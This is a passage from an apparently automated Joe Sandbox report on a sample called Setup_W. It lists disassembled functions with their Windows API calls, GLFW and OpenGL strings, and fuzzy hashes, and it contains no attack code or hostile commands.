                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Client$RectScreen$CursorFromPointWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3638364385-0
                                                                                                • Opcode ID: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
                                                                                                • Instruction ID: 3b0094546bf2133344687ff90385f188bb14cb557acdc0aefd7f0507a1609907
                                                                                                • Opcode Fuzzy Hash: 655dac294b05172c6d6022f6583b98ecc00e09523a12974f6cd1c6196573df2d
                                                                                                • Instruction Fuzzy Hash: C711DDB5909614EFCB01EFA9D98499EBBF8FF89B11F01C429E988D7205D7309805CB61
                                                                                                APIs
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                                                  • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                                                • GetDC.USER32 ref: 6460A61D
                                                                                                • GetDeviceCaps.GDI32 ref: 6460A637
                                                                                                • GetDeviceCaps.GDI32 ref: 6460A649
                                                                                                • ReleaseDC.USER32(73A24620,73A24620), ref: 6460A65B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConditionMask$CapsDevice$InfoReleaseVerifyVersion
                                                                                                • String ID: Z
                                                                                                • API String ID: 1822872229-1505515367
                                                                                                • Opcode ID: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
                                                                                                • Instruction ID: 707d5dd32e3a15a051cc870e2508f533cae2b5a77f41d0fd4278f5d9a3e11ce2
                                                                                                • Opcode Fuzzy Hash: 6a18b85b7a8642ca080b40cb02792ace88e6e28788add9c392d4be4475e20ab3
                                                                                                • Instruction Fuzzy Hash: 6B21D5B0908619EFDB049FAAC94879EBBF4FF49755F01C41AE89897240D7789414CF51
                                                                                                Strings
                                                                                                • Cannot query extension without a current OpenGL or OpenGL ES context, xrefs: 64601A43
                                                                                                • glfw/src/context.c, xrefs: 646019F4
                                                                                                • JCad, xrefs: 64601ACF
                                                                                                • extension != NULL, xrefs: 646019FC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Valuestrlenstrstr
                                                                                                • String ID: Cannot query extension without a current OpenGL or OpenGL ES context$JCad$extension != NULL$glfw/src/context.c
                                                                                                • API String ID: 1011161555-1144784644
                                                                                                • Opcode ID: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
                                                                                                • Instruction ID: ab578d73ec95341dca835a5dd6844567f22864d8ff57f30a04dc3bc4f80d642d
                                                                                                • Opcode Fuzzy Hash: 3b3b6993832a73cefe9d8a3578806f8ac418a9833aed2703d4bc951321dd21bc
                                                                                                • Instruction Fuzzy Hash: 2D3129B0A482059FD7059FA9C6446DEBFF4EF95B48F01C92EE8C88B201E7B58481CB52
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: _lock_unlockcalloc
                                                                                                • String ID:
                                                                                                • API String ID: 3876498383-0
                                                                                                • Opcode ID: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
                                                                                                • Instruction ID: 7226391e82f3ffb54ddf767a3f68459dd85a18fc98c3cf3d1ef2e38c82678296
                                                                                                • Opcode Fuzzy Hash: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
                                                                                                • Instruction Fuzzy Hash: 862129706082018BE700DF6CC4C079A7FE1BFAA354F54C669D4988F299EF34D841CBA2
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: calloc$strncpy
                                                                                                • String ID:
                                                                                                • API String ID: 3831826497-3916222277
                                                                                                • Opcode ID: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
                                                                                                • Instruction ID: 67085ad108993bd3ce5493b9702836e3a77efd71178ef21b3a30bf35c66d437d
                                                                                                • Opcode Fuzzy Hash: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
                                                                                                • Instruction Fuzzy Hash: DB21D6B0908245CFDB04EF68D685A8ABBE4EF59714F41886EE8488B302D775D885CB92
                                                                                                APIs
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B02F
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B03F
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B051
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B063
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B06F
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B081
                                                                                                  • Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B092
                                                                                                • MapVirtualKeyW.USER32 ref: 6460D4D6
                                                                                                • GetMessageTime.USER32 ref: 6460D4F9
                                                                                                • PeekMessageW.USER32 ref: 6460D528
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: State$Message$PeekTimeVirtual
                                                                                                • String ID: ,
                                                                                                • API String ID: 1171625170-3772416878
                                                                                                • Opcode ID: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
                                                                                                • Instruction ID: 6c46310d30a11a7dc731c5c7cee37011acf60de45a34a29a6c8da7496cf55ec6
                                                                                                • Opcode Fuzzy Hash: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
                                                                                                • Instruction Fuzzy Hash: 1451AEB0908709DFDB09DFA9C58469EBBF0BB85715F10CA2EE8989B251D7749884CF42
                                                                                                APIs
                                                                                                • SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
                                                                                                  • Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
                                                                                                  • Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765
                                                                                                • SystemParametersInfoW.USER32 ref: 6460B10C
                                                                                                • SystemParametersInfoW.USER32 ref: 6460B130
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConditionInfoMask$ParametersSystem$ExecutionStateThreadVerifyVersion
                                                                                                • String ID: Hcd
                                                                                                • API String ID: 2138337975-1373192235
                                                                                                • Opcode ID: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
                                                                                                • Instruction ID: d552217315db711c433609a4cec4eadd01faa30551330ef515e34a60748e55aa
                                                                                                • Opcode Fuzzy Hash: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
                                                                                                • Instruction Fuzzy Hash: 101115B04093449FEB00AF65CA8835ABBF4FF44B19F41D89DE8D84B245D7B98484CF92
                                                                                                APIs
                                                                                                  • Part of subcall function 646107E0: VirtualQuery.KERNEL32 ref: 64610867
                                                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,646012A5), ref: 64610AE7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual$ProtectQuery
                                                                                                • String ID: ,cd$,cd$,cd
                                                                                                • API String ID: 1027372294-2852098346
                                                                                                • Opcode ID: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
                                                                                                • Instruction ID: f638c8752a7dbe41f4048da6431f0888c62e674f3ed1fb414c928f257171a9b6
                                                                                                • Opcode Fuzzy Hash: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
                                                                                                • Instruction Fuzzy Hash: ED114876908356CFCF10CF19D88068AB3F2FF8A718F25991AD9896B211D330B956CF81
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DisplaySettings$ChangeEnumcallocrealloc
                                                                                                • String ID:
                                                                                                • API String ID: 3544475687-0
                                                                                                • Opcode ID: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
                                                                                                • Instruction ID: c93ec9d385b3a10b2921e0670dd044a3fb0b81f4653e2be81fd693868db3d0a6
                                                                                                • Opcode Fuzzy Hash: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
                                                                                                • Instruction Fuzzy Hash: E1510570904219DFDB25DF28CA847DEBBF4FF59740F0085AAE88897240E7749A85CF82
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: DataInput$callocfree
                                                                                                • String ID:
                                                                                                • API String ID: 253271340-0
                                                                                                • Opcode ID: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
                                                                                                • Instruction ID: 1ed7145e197558902ff6e0cccc15012f54cdcde242d917b0b66c177f5ba52cfe
                                                                                                • Opcode Fuzzy Hash: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
                                                                                                • Instruction Fuzzy Hash: 1041F3B4908385CFDB11EF69C18428EBBF0FF49310F01892AE8989B245D7B19895CF82
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32 ref: 64608499
                                                                                                • calloc.MSVCRT ref: 646084C5
                                                                                                • WideCharToMultiByte.KERNEL32 ref: 64608502
                                                                                                • free.MSVCRT ref: 64608522
                                                                                                  • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                                                  • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                                                  • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
                                                                                                • String ID:
                                                                                                • API String ID: 1537213191-0
                                                                                                • Opcode ID: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
                                                                                                • Instruction ID: ef536ac8975c90811966666c3dcde00199d1f5530d8d2836d31ad81eeeae261d
                                                                                                • Opcode Fuzzy Hash: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
                                                                                                • Instruction Fuzzy Hash: F321D6B05093019FE350EF69D54434EBFE4EF85764F008A2EE4D88B290D7B9C9898B93
                                                                                                APIs
                                                                                                • VerSetConditionMask.KERNEL32 ref: 646087DA
                                                                                                • VerSetConditionMask.KERNEL32 ref: 646087F6
                                                                                                • VerSetConditionMask.KERNEL32 ref: 64608812
                                                                                                • RtlVerifyVersionInfo.NTDLL ref: 64608830
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConditionMask$InfoVerifyVersion
                                                                                                • String ID:
                                                                                                • API String ID: 2793162063-0
                                                                                                • Opcode ID: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
                                                                                                • Instruction ID: 4a59f3fe28d3ad8b5ea2a09b7c1bad3ccb1520fbea3e1431eb5efdb67375cc92
                                                                                                • Opcode Fuzzy Hash: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
                                                                                                • Instruction Fuzzy Hash: 1A11DAB08083049FEB11AF29C5493AABFF4EB84354F00C85DE5D887281E7B99598CF82
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
                                                                                                • String ID: @Jcd
                                                                                                • API String ID: 53972724-3276935698
                                                                                                • Opcode ID: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
                                                                                                • Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
                                                                                                • Opcode Fuzzy Hash: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
                                                                                                • Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B
                                                                                                APIs
                                                                                                • strcpy.MSVCRT ref: 64602FFC
                                                                                                • strcpy.MSVCRT ref: 64603079
                                                                                                  • Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA
                                                                                                • calloc.MSVCRT ref: 64603030
                                                                                                  • Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF
                                                                                                  • Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6
                                                                                                  • Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd
